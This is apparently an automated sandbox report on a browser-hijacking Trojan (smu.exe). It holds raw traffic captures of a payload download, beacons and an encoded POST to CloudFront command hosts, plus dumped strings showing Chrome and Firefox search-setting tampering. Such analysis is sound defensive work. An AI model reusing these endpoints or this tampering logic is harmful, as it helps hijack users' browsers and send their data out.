ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:06 GMT..Content-Range: bytes 10000

00-1249999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412

95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: GOtOc

UaeRubNkdJJcxbDp34Q7UvWRt24FjfdWQixZSboFzckdf8XyA==.....@.eU...N.wz.F.

.........'..0.{.)U~...N.:?....T.t........SG'/.<..m....:.K...._.....

...\...C.v%.............d..xkD..p8%..].Q.....9.....N\&h.D.q.....u.K.p.

.C..]DsO.....DnP|.?.o.%.........5k..M...9......E.,.6,p.5..W.....i.t...

.HcH..?...6..jR.\....Od.....[...Jg..!....;....F....)~..........W......

*.;.t.....X7...a. :.uw/.S.E....c...`.jj._....D..x..93.....j.......?.V.

....C.=N...v......./....[..zN....g.].4G?y'^q..,.w...).z1...u..,[n?..p.

f..k.....3CE..^.....6.........t.%e......Q]!.#.J.6.(..N..X.#.2W.u#..Tvi

......LA.F...hb...w%..dC.92..9a....~Y...*1.5jM....ZoS........dR....1&-

..~Cy.....^X.<ih..O>..4.......Y.P....L#...~......o.~..4k=..&G.G.

..[. F.... .w./..........^e.oW.Y)....:'.....c......lb.TN.....[.h......

S...x.6..(Ijbj...|F..K.......$e.j.z..4.5.H..........k.J...8q..#....Y93

g.......5TQ..8.$..:.P.k....H.i).9.S..U.H........CsCQd.9f...........&lt

;...MW.(_.......{.k..i..1`..Mx_&.v.y>l^r.H.......o. .&;;.W..F...6..

.1..^.=F..W..=.\.?l..^....4...j....D..'...8]..%Y`....L6...c..U?..H

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2000000-2249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 2000000-2249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: In5ZPfnrz4RStEHUJKJFc_bd7MY7cv54AbD8JuHhDS8qw4BcFn41mQ==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:07 GMT..Content-Range: bytes 20000

00-2249999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412

95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: In5ZP

fnrz4RStEHUJKJFc_bd7MY7cv54AbD8JuHhDS8qw4BcFn41mQ==....M..HUn.W..=....

Sa..s..Mh.^.B,=..._V.e3F..;...Y.1.r..A.&gS3.....;.l...L........_.....4

..0L77.7,O..(j..~.# ..H{ ..zXg.k......=..5f|.*2./.ie...>..pQD 'A...

...\e..ME.....2....gm.lu....!..9`....{...2IY.^.n.x..$...xl.....0..r...

y[.7B..`..j...PO..?...L...h..........r...........L.ad....uv..X.}......

."...x?...w;....M.M.Vb.....0q.}gUA...G.>..%L.~.....k.!.....i:.5....

...?...1......1......NI..N.....R..<....uv....U.s.B.(.P..pL.s.."..8.

......4&.......[o.bpoJ.."M.b1...'"J.:.(.;->.....&_..E...#....L.Z...

.w.........c".....:..oT.....<....N.!.N...u..c......;.|.C.......A..\

.._ -X....Z...........UDC.1.D".TZ.e5.q.5..x....k>.jDu.hk..Y.@......

?.i....Fp@.>e...N..:O...15Y9.....}.uTa%...N2.>9...[.&S.fc^.."@..

...]s<...~.O.Cn5.'^...e...v.......b...m<...........ww._.p.u.e.61

.gn ...$b"..o.....^.4#]...........t../.xi.../l@C}.I.V...G..FB.e.....3Y

.O...^y..*U..^G9..........M....T....W.L.Wn.t.~A.H9G...x..CW.M...n:...f

....4....~.;a........,.2....z... ...@D...F...M.*....MM.?..R.....k.

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2500000-2749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:07 GMT

Content-Range: bytes 2500000-2749999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: UJBgyu-grWH9iJrDK9N1Fi5GMnW6lToTKqBVlqBOJkPDl2iaqxci9g==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:07 GMT..Content-Range: bytes 25000

00-2749999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412

95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: UJBgy

u-grWH9iJrDK9N1Fi5GMnW6lToTKqBVlqBOJkPDl2iaqxci9g==....vH..r...<..X

QR.N.....O3.h.&....nS.:MT.b.$...k.!.i...%.6#...._.7".A:...?...c.N.D...

.;.7..N..`..{....kc.E....f..X.i....@.F...w".....4...../.&H.N..B...*...

'..i...t...{...n@=#j..y.-...-..................JCpNR..8^|..%.]0..?...p

g..b.S.=...2..8......)#..v....r.b^Ow.l....St.Kc..Q..p'....=0Up4_..D..y

d..Q.......a...4.4.Q.):...~b..\x.e..M..y 9.30.....`4Z..g....C..*....f.

..(v_)a.5[..>...m....p.x..d#.4.Z.Cr..@.*S._.$....v...a..B...XC.)g.7

..........%k..IX.?..J`..>.c..........z.....R..3 ...0^....BL..{.;...

..... 0cc...zR.pL....-.. ..M..8....(&...So..!..R..[.........^.........

.~.e..Z.....|[:.....%<t........k6.X~2..q?aH. ../..(.).8.._..a..:e..

.T7..A.U.....l..........q.."B..e.k.!%Gw..............W..K.T...7e...T..

.U..6.....].so.&.^.......M.E..U.....72\-.\d$wd.........4..B^.....>#

Zx....Y.o.2N.D.dB_.e4.Q..Y...68..*..g.0.....a...Q.k.06...j.x19' @.O&gt

;.'..Y.i]@...U.....dG[.p%.O............c..j..H......Y*.#.N..V.......

6...d.9r.........>mg.....^.@..e...4.PY.3....<.....Jz..s.LS.m

<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=3000000-3249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: private

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:08 GMT

Content-Range: bytes 3000000-3249999/3359008

X-Cache: Miss from cloudfront

Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)

X-Amz-Cf-Id: HYkReG18M0uc9GlZ8mnOOUb0KoWlETc6mEBYP88wmo9j6kPC8AKe5Q==

HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..

Content-Length: 250000..Connection: keep-alive..Cache-Control: private

..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..

ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS

P.NET..Date: Mon, 20 Mar 2017 00:20:08 GMT..Content-Range: bytes 30000

00-3249999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412

95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: HYkRe

G18M0uc9GlZ8mnOOUb0KoWlETc6mEBYP88wmo9j6kPC8AKe5Q==.._0Z...g..R~*. ...

.t.......Q!."C..*....p....I...@_.X..-.9...o.......b....|.......#u.E...

..c.c.......G..{.m.7 .9N...z.R.h.....O.=..L7-..C.Yj....oo..z!. |A...p:

...U.I..R?-....*>....5{.......2X.II....(L[.a....p.1.^5;G$.O".'8 ..

|...\.(..M....SW..%.y.......A$...*...6...H.:R......).2.M-..}.kZ...M..v

.;e......V=-.0.i.,.Z>..M-A..!........z.R...K..:.v.%.fh.....)...o..e

`...Xi..t....6^.Hei*y..D5.C.^..$yr.J!]B@.Wdf....w4v.P.T...7_....C.I!&.

y... ...p...P..d...|....&........a..:G.k.`0....?..5...V@.G...2..w..2so

v..}..'...Uk.<02.r...[...=.(Z..s..5....7e._...@.V.T?G...? V..}~y...

.'{.y.1..hj....g.I.......o.c...@..W.H...%'...#L..l.f_oN..;.&.?D.c[..*&

gt; &..t..q....RU1.gn...5.Yn.1...R..;'..."..i..=.9....&..0..;.d..w).Y2

>u..-ID....4..Br<..0...\z.D1......:..../..{..g...t..zt.7....;.'.

.k.q...._..O.\a:8..Xv.........U&...XgrX..t&Q...I @V.ed.RR.c0.).,......

..e)$vf..n..1.V..*...0.Q....(.F..,... t..........u}......0......7}>

..2.....3|[FE.C....."..0...l...Lv5..f..8u...D.....^.-a.....V...!..

<<< skipped >>>

GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYR6njPZcIS19LQZ0RbIZgn/G04r2GZQbxA4k4Gm5vvSsnGAt48jCvkuTKeC3EisBSuPQCW3Xc52o2/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdYzx82mF 8 w= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)

X-Amz-Cf-Id: IqKgcCHBKYBnbQOW_sqLgoSHwKTPgWNQH-dElrevhRthrbjMuiZTUQ==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:20:14 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 27b3a801292660302bc6c8d6a96c71

ce.cloudfront.net (CloudFront)..X-Amz-Cf-Id: IqKgcCHBKYBnbQOW_sqLgoSHw

KTPgWNQH-dElrevhRthrbjMuiZTUQ==..

GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYTLUfe2AWI4iW/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdKPgmwjXNu7I= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 5dGyfRyvNsaT36GyavkHw40BfuerDGzXL3efhPpd2OpD9RNXP77kuQ==

....

GET /p.ashx?e=bdqY0vC4PYtCQdt9doPgoA0rZFNspeHnFDDfVv/vH29/uaLevhL3VpGCCoDalgcEvSm4upuKAkb3HPmTAFrGinfglf7YsJYJYvL zeepkoH7lS9xrvVML BEf8zqYXvVBuc4HO5RaucB0eAPmqRh7cqZ27dtquSa6Yc5lgnLWj9NhpNg/N/OrsNgV0KIQ93 dulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hRc0NdkJ4D18DFbcjOkM5Uo QFr7zZfYbQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:14 GMT

X-Cache: Miss from cloudfront

Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)

X-Amz-Cf-Id: WIaVVq4FaajpOxw7kcMX8NRAQnzthqVVm6lg-bt7YByOUnE5sU4r-A==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont

rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4

.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:20:14 GMT..

X-Cache: Miss from cloudfront..Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263

c3.cloudfront.net (CloudFront)..X-Amz-Cf-Id: WIaVVq4FaajpOxw7kcMX8NRAQ

nzthqVVm6lg-bt7YByOUnE5sU4r-A==..

POST /br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8fabe64f8ec5d8b0b835e8a83f29082c&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)

Host: d23ocewf5ttxmu.cloudfront.net

Content-Length: 2086

Connection: Keep-Alive

Cache-Control: no-cache

d=MtqTE47KGyjjA8zS3H7pJFOADWaZCWMCDWjQ0ujplOd9MbV/lVmWaND 60ePIdsrOcMBzS3H5a0be7N36qAF8kdvdSvmslRxPCNs1oS8WZUOzaar9Egy5SzOr9rhzlAQdf09Xr401steNr mQH VoxX6Rze/7NvJYTdPZS04 jvBMWqv6Qvf9DNZawo3yh8aLrtJikea7Vr6RYlRBKnKPhzN0jVqDPxXWcZpZKsofN7lBOl e1/lbjhigtcqjvKJ0HXl60Dt/azGf4WyQ4pBcaujTuYHUvmbfXoBUdDBpfst5Cnu/6UfyPOPBhh4PvLgPcCVrzCocS421e/NCDWm6mw3fw1TVhnvONcolvvTJMhYKAbBQ6MCy/YiDfDObVBWQ6lOY3KgH2A7Ok2sevxNYKZBkH1lwef5iVaJzvCTQFDpqXuumXfvxH80JeF3wmqbFDzGhyy5ZVQY/zgXrmxAdSaCYQnjsEpKqNUiWYmuW54ILS5IZNtenyQHPVyolqBCD/5l0Jp/pGw/wdklma XkH/sMYQW/q6APL9AZS6vInj5q402KYmuO7uUVWQkNDrUzVQogiSiHUUbkt9xGmkZ3KbvoMG8r9VxUGu2nQcHLKpLbWdCZoCU6lTrA4SDxYt3XQUh14jtaQ6zaqej14QNUX9tuDXbGFU/4ilR5GOuvw37L WtwDUNySQevrJPNOODaBdBZnaFneyb3tAKPGOiQlcUlcnVIrWNWsGrgZefH875FB4dAsQ5PNnszPtZSAO/AudQs9axn3MjcyAgLnSpYGBy1utPgkEJWFebggy2cY1Sa9k zM04yMJWSpAMTxjmcpfDFzOuHVu dUt73kOcovtbTwO1fRDkEvb7nxvf6F9X4XhtGfA6F9un4Sj tycBIXzlj5AJYVGg9CeDOJiHVYEMD6f0Yxw9PvVvnPv67ClaftH4KT2nccqYvSDAOzz7tO5R OJbSC7H67zZblJzmrY3OfIBxIaolmlJImDSsXKAcuKKCKL0Y0Gf/sSMU6n3cHi5Y9Aw06mw26Anf1ZHGdeySNMAGf2g58F8QzEcR48L

HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private,no-cache, no-store

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Mon, 20 Mar 2017 00:20:18 GMT

X-Cache: Miss from cloudfront

Via: 1.1 69ae15d1338b64299d3942a44fc1fb96.cloudfront.net (CloudFront)

X-Amz-Cf-Id: y-P4GnL3XgWw958bmBsKHnH4bmjE4R0VQRvOHKvG4EUsEqr--HSwQg==

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

smu.exe_3356:

.text

`.rdata

@.data

.rsrc

@.reloc

D$@j.Xf

<:>

t8Ht.HHt#

F2t%f

#t.Ht

2 34 567

j.Yf;

_tcPVj@

.PjRW

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

0123456789-

%b %d %H : %M : %S %Y

%m / %d / %y

%I : %M : %S %p

%d / %m / %y

operator

GetProcessWindowStation

?456789:;

!"#$%&'()* ,-./0123

1.2.3

SQLite format 3

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY

CREATE TABLE sqlite_master(

sql text

3.7.2

CREATE TEMP TABLE sqlite_temp_master(

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.3.12.1634

smu.exe

Chrome

Report.xml

/Url:

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

CCCzdef1,11111111-1111-1111-1111-111111111111

NtQueryKey

1.3.6.1.4.1.311.2.1.12

urls

ERROR: %s

SELECT * FROM urls

WebData path:

favicon_url

keyword

originating_url

suggest_url

keywords

keyword LIKE '

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

chrome_url_overrides

urls_to_restore_on_startup

www-searching.com

template_url_data

image_url_post_params

instant_url

instant_url_post_params

search_terms_replacement_key

new_tab_url

search_url_post_params

suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

%s>

%s="%s"

%s='%s'

version="%s"

encoding="%s"

standalone="%s"

Snapshot.xml

MozillaFirefox

GoogleChrome

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:

rDz2oLrxEd7tqorlxPHCSbpkVt/bZZuclcedjgvjrx5tDx7XnfZQjbd9WRhEjQzrKQBL lchgPpw2joBB IwFAu5RW4JcZP3S5Jm3QM9klwivxpzRjh9 jFGeuCwg7fa/HM15lK3jTHXUjVPnIEadpmY4jv7ywlegYHRQyc7xc1XcTe2TccuzmMaLo68YiE5vPkmCDlASCbtMpHFeFcupx0t7OgkYmbDHAwQlgu djTn6nQfC1xHBcRL7fYjaJ2ad6dGOUZAsbHeIpUSp4nxGHOmvAL06vqJh3DTzsSO7EPDVz0yD8gc QDljr2BUAvuNQBfQLANtmT37rJ0C7hqUSVg1mD68 CZrHjd1CeJmHamAXlseJPSnm KFnG/1c coF3P58SUT r/DM6745nlDqpqg2fjiUstyu69sMwUOFgbB6/PgPG0VAckChf Pylb9b7DIN1HCdWS O3BxhtsiIkpaPOUuahRNtoT4DpvGf1R SjMvvia f1Tk4EbUjpkeT/SHrpFL/1Bygwwpd0nFaFLRdhAD34FQkAPT/sP2Yq0DvG5FczLuhzkVhxYkkcNsdHIIn4Pj7VwA1dYGg6YME6txpWMi6IsUM7JtNamFSHj5S3RyMY2HkpWlnehRIEWOU8rufd/8NxdxEh4hGldz9z6FDkN13F9KpCCJD8p6gHgIHi46nRIyLhtzHs/FWgpIBScgh4 iUXE2ilHKH TRuonsl8u6HjwFVtlL8PW/lp7SBs9wnHQwEYX2vppXvwar4qeOKyNcGnOSf7FYTwmHhsc3yvZmCUslXEwpIEruKGRieVqJvUb9SQdo04iRwEkfTsVeERRWKuoAw/ttnJlJhzCghYsBqKYx1GlhZbZo9QDMXkGhZfJvEzr2MoBfZ9IleeloO2xfLoM74nC0dxiWyC TXMw9k6pY NY534Wmh Y12vy1sB3oX4EMJycv8h/bDGNdfdCNKPTvOdX6bbP cU6Tgq9ZzAbXeb7DvI4iRxfch63IFn6sz55sw6K2WVADtytAT0LQ0z5I5lEeaBbuysREfZQZl9GUs6cncIdRRsJOWk0C7LrrCvmdUvmm6wCSPhteAIrMvwtOjxBits2XlplkTxaJMfOLcgBrigpnJq1oHslokry4IzFwOof70pLBoR BvjOV3j7UWo9 dCNhbDBvLmNnPEuBRlH0rJEQNQ7E1uLC7RQ/bHIOjGxIG267/iQ3QpvhLBc3HhWgw4zXBntyzc1TsWFRzYDAG z4XsjeXqTBj5jX/1Z6MGyvYxYlVgcxFtQXZphihfRO4TFYmInczbFheMg6g7L2gAbu/bQftTSM3Gk9h1TZvO753sFgpAu5HpzAB nwdqTgSdjFxVQYmLxtAxtGyoMBo1SY3w2Yt6ZBhjvfAFmMg9W7Quiex4rwUPY2phen8AwEaM3QV4ELy/Rwz2G8E8gRj1QMYCaZcewRIj S1rQtxx8FGCU svnd bqHqA9lOq52fOkjdu2ALbbk rd1BPpBdvwY6giLkGVBZkNaxzifKFbMWqFp1f4YcINMpvHONCm4msq2 EbUu4ouR/hFrYkKlZf97yzsy 76BSgPhqxdJuY02GjlcZGNGJBwUSnjxB8jKxC1gOzFVxPL W7nVU QXQ5HrHtflvF4G4NoWAC vtp9a22bq ULuTu1f9LA7aAe0KPRL5RjaHDbveVCYCRm0QcIYjvND1OZbSxHBHVjukFmCdvdbqjiduWpgFtPly96JlJFDeDF/2iVnCEjyiRxvRoY2a/vPYSqcsyhyDwgne/PDbCLW9iU0F1Yma7ADBunbsZFYklmUaLAn kdzmm5dHz8WEcYotx5fiMIAFvTNNkJKk3l7gctXoMwa61 8hcgH1IAfMZgMBE8M5FhEPn8UDmWiw vZccVn1BaNIVuTXA/g3TXWtw61tlvIz742S7f0dAw1Z2tvGQP0kT9 XdJj1 5pY8GHmSMRJb3SOB0TIDbnP7k3zz3x8bNcre0XZ2GwIZBRs68rmk/Jzn7u45EkfvXmFejM5qKNqLOj5Cpku6Avi54Uuq6iG6/lMzVthlWWyMyz9WnbrUvgA8//ed60WWAg2ADOaopG6S4r8B02JHwdn8ZNEQn5Iku3Y0vnc9zwCmuEeU5aL783crzK Rqt7mZffHAaDfnuWcfmLDrgGQjz/EorwYyG7N7bno/I3RF8S0ULuJfosVFOikILFxZbyk4MyiLqoYWOIBJiIjmG7sSPmNuTv0U9MGH1cWIFnSok1FmWfXK9SyQ8j3 UOYPGtQW1mTjauPg1NnRGsxGe1tXhnLcIlpK/QWjs8jCBJ6Dx0k21TFFIG6hx5gNXRYrUw abeKMzLXvwOLz6jqtbZjZhTbI2dQGartWNchdsO6WigCO8MA1AmO5EPCynaeMIiebrn2vtdI wEM0MWez orMF0j O8YRhxP6uZG9JO0us6H5dQva4TL1j5RN/NG4DlC/mfJcT4hfAhUZxzX9VEBuW Ixx0w8HtS3YAkSYtwYqUB08DXihh2EQn UdNM2vWd8DUR7Jfs8VGPJefn7C2XoDnhLXBmUtfDIdSopov9LF9Irss5U9wE39MOEmQK XF0LYFm0MNlncLepcPBaqDNn48oKlgc XEjFn3kC uqIrsc/BkTOX50BFnyuQe/3t4JyifK24T3JlHhYLrN7U8XHnQGTmbX6Jmbab1d3hGxeAPXGPc/TBlWuRlOQo7E7 /SZJAxGZ13KUIMI65CsftoTkctXMRMRvMLNtmDAFZ6RC5awFmJUuH0k5NoF3r1ITFyR9BSKENVR0xFcKahmqnkmvh22OpYVJythHgVTHY6kSK69Wxvp5GIVJe8FOiHoa1UaWXXpMH u6H8fyJqDzkPTk4bMJr0IqzruXXy4C lMp02Ta1EZqZ4LEM25YEVMSP42bwFEHVjqi 1KbaTt5ZEl3glyMulqCMOS9t04Dcz qamgzM26muS4RFZspdV4 ZRsbxwI0tglrh7o/Qt04Z7Ud0Vlf5nzBmb8GVMqcdTdlTJlThMD TfzbXNqmFGUyFXgTtXTKHNln2ILeEZCJFm13cKJ8I77diH1xOofJUvwGBQyZ1tIp9ToOLVGipJZh ybUpHwIQERilwFpdgVjM96ljLZqdSUPHobSxccFA7qXwII5N/NavtVegmtsDZ3Vo9NiuF41qR8e04/s8zGXWxxZxdCKIg3Lxkanfp3I018i94k9uGFuJzCW3ENiQ95f701b8dT7P25xUx6yVVFzd5rrgfnPdCMd0W44kPSSfFnHDvagDcn3hVLuDoqYEt279k61Hye0rlDa55DR00uXjBMcBnrym3xcjjCP92N1a BZv2prBLuBK36rY2JLW9caOGvN0AwQ8jrsJXCy/P2iGpnxGOZMbCymjIWxGVfdo7tRnDOTapJijHeYIs0ocqxz4qoAQ0V8KhaOoSJvaeEfT1ny1ajPnB5RSKfjqUlnAJZRZJsb8jYjEVetQbc1Z/Gxy3Q9btkNAIY1vr7qpb2/GPPkLxbPsab2yYXgqSp58NbJq1GT90 l0DHsLtutKaghoK7u8P 1YFF 7ECmqGGmAa2QumuSogAt8C7OCWkRoc239Wa9moXVUEBtSPDRCF1vrEpnmVb uE2K0x2kpyLTnzwLpaiH4ItiS ARDt9c2aA9RLxUkGWVb toybApu0o5XTjtFVrUALaTJ5y5fOXzy8hrbH81/IOMV0MgUd5dKJFHMH /dnVvrV mRxybjFvB95B3VZHLZsBYhCwi1ubOUqntHspciiwnlNPhyqAoU2YgOqqH UAJ9fFS83GiYZte2egV2EoZFWF7KZm8NHKIB3odjjU1eK4sNBiseSi5OH/N2CrEzAbi9Z5ovbepTpn4e6jiQMbH0o6dh2ylMhmpiJeV4MSodV7yH0J4aY5WEU/HThGaYSIrfEIfl3Y8OqV/EDPWm3pHwFUKoxXI4hxkx2TGxZKx3gByInRwYSSbSarZgS2ZENN1jIhYCL/zt8FinlhiMsLZXi BaF61dxA 4T4skKuMyffuoveNe1EidkpbVubUN9B9jCP5BU8Z3uHPpCBLbArzcpW6Mf wCC/QM7b4/GvAcgRHN3BCajQoRDuw9T8F4EpJgzyDBZBiwxfio6cAV9IQE9N8vkUcTvb7tjOnNNlt4jHur2ggmlygIg74SSorD5KQYtulF1GtLjEfc7r yM641jR2b6tQXK3dhBBeUlH811h0KVf6QFwSrqXmE5fa0MlelImv36InIwkcADTxVZ5fVvIQQVqsH1xWZTWikdcNBLtlpBujGUQufGv7W7VlWohRdBOpyyhsnpPKojvjQDEwTUn8MknS2mbvNguCCUvc4JbP/Gl3NeOOzoA4lcVmIrzgHW85v4J I3 b0AK299i8hkt uNHhxu830uVufOUTMSwR4GrrPJ8FoTfqPVLvI0/Y3PF1LLU1XM TVF83IMrHvl8n73btcFeS0DttowqnBUtKN9Jun/voeLMe1g9vZ9 FtXTkxZkgwo9S0f3bx1m1QygaRLnV9akWR6HEJ1xA3lcNCTi8GAWRd5IiOWTGWQz1XS055V6LvFiYMO11Bl48PYy7E5OAI2ESPVcznylZrtGhDmvprOqGd8oxYJzKwhGCwC8pnE2McKjsW2xpfD T9hBm/t8oyGvcmke8Q4EkFtbm7gbezN0I1S8B94 dWz9/m6V7AipZ9jR/FpIA XX5lT1CeQPd5 lBP2OYJkEPxHrxDaeBwNT3hEf5Ov 